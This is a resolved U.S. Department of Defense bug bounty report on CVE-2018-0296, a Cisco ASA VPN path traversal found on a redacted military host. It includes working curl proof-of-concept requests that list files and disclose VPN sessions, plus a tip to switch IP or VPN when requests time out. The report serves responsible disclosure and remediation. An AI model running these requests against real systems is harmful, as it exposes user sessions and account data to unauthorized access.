[CVE-2018-0296] Cisco VPN path traversal on the https://████████/ (█████████.mil) - U.S. Dept Of Defense Bug Bounty Report

Vulnerability Details

Technical details and impact analysis

Path Traversal

##Description I discovered previously unidentified instance https://████/ (██████.mil) in ███ network, vulnerable to the CVE-2018-0296 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-0296) ##POC ``` curl -i -k "https://█████████/+CSCOU+/../+CSCOE+/files/file_list.json" --path-as-is ``` ██████ We can disclose user sessions by quering /sessions: ``` curl -i -k "https://████████/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Suggested fix Updating to the latest version should fix the issue. Fixed version should give 404 "File not found" error. Example of patched version: ``` curl -i -k "https://mvpn3.███/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions" --path-as-is ``` ##Notes In case you experience request timeout when reproducing, try to change your IP/VPN. ## Impact Path traversal, which can allow the unauthenticated attacker disclose sensitive information such as VPN sessions, files, usernames. Under some conditions it's possible to cause DOS attacks

Related CVEs

Associated Common Vulnerabilities and Exposures

CVE-2018-0296 UNKNOWN

A vulnerability in the web interface of the Cisco Adaptive Security Appliance (ASA) could allow an unauthenticated, remote attacker to cause an affected device to reload unexpectedly, resulting in a denial of service (DoS) condition. It is also possible on certain software releases that the ASA will not reload, but …

Report Details

Additional information and metadata

State

Closed

Substate

Resolved

Bounty

$750.00

Submitted

Weakness

Path Traversal